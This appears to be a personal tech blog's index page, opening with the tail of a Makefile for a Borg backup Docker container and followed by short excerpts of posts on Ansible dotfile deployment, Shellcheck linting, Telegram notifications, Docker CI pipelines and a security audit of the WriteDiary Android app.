	--name $(CONTAINER_NAME) \
	-v $(DIR)/data:/var/backups/borg \
	-v $(DIR)/authorized_keys:/home/borg/.ssh/authorized_keys \
	-p 22:22 \
	$(IMAGE_NAME):$(VERSION)

stop: ## Stop a running container
	docker stop $(CONTAINER_NAME)

remove: ## Remove a (running) container
	docker rm -f $(CONTAINER_NAME)

remove-image-force: ## Remove the latest image (forced)
	docker rmi -f $(IMAGE_NAME):$(VERSION)

This docker run call mounts two things:

Automated and Tested Dotfile Deployment Using Ansible and Docker

Thu, 08 Mar 2018 00:00:00 +0000

This is the second part of my posts about Dotfile management. Part one can be found here.

After spending a lot of time and effort on your Dotfiles, it may be useful to setup an automated deployment process. There are existing solutions like GNU Stow, but for maximum flexibility the use of Ansible may be a better option. Using this, files and advanced configuration hierarchies can be distributed easily. This post covers my personal setup, which also includes an automated deployment test approach for multiple linux distributions.

Using Shellcheck and Docker to Automatically Lint Dotfiles

Thu, 08 Mar 2018 00:00:00 +0000

In order to prevent errors and side effects, it’s useful to use Shellcheck to lint all shell scripts. While checking out the Dotfiles of jessfraz, I came across an easy way to integrate this kind of check with Travis CI. The mentioned approach triggers a travis linting process after pushing to to the Dotfiles repository on GitHub. This post will explain all necessary steps to integrate this process into your own repository. All credits go to the original author of the docker images and scripts, of course.

Universal Notifications Using Telegram and cURL

Wed, 07 Mar 2018 00:00:00 +0000

If you ever wanted to get notified when certain things happen but didn’t find a lightweight solution – here comes captain Telegram.

Using a simple Telegram bot, it’s possible to send notifications to your mobile phone or browser. All the notifier node needs is curl installed.

Registering a bot

First of all, a Telegram bot has to be registered in order to send messages later on. Follow these steps to get started:

Building a CI Docker Pipeline Using Docker in Your Docker

Mon, 15 Jan 2018 00:00:00 +0000

Note: This isn’t up to date anymore, instead use img .

First of all – why should you want to build all the docker images on your own build server?

Complete control over the build process
You know when the images are built and how up-to-date they are
Use of private repositories and images
Because you can

This assumes that you already have control over a private docker registry. If that isn’t the case yet, you can just use the pre-built registry image using the following Makefile. Just be sure to edit the placeholders marked by ~~.

Auditing WriteDiary.com

Fri, 27 Oct 2017 00:00:00 +0000

WriteDiary consists of a webapp and an Android app (version 4.72). For the audit, the android app was the primary target.

The developer and owner of both the webapp and android app has been contacted multiple times to develop a quick fix for the issues addressed in this blog post and a vulnerability concerning the webapp which isn’t described here. However, no response has been received. This is bad, as you will see in the first finding: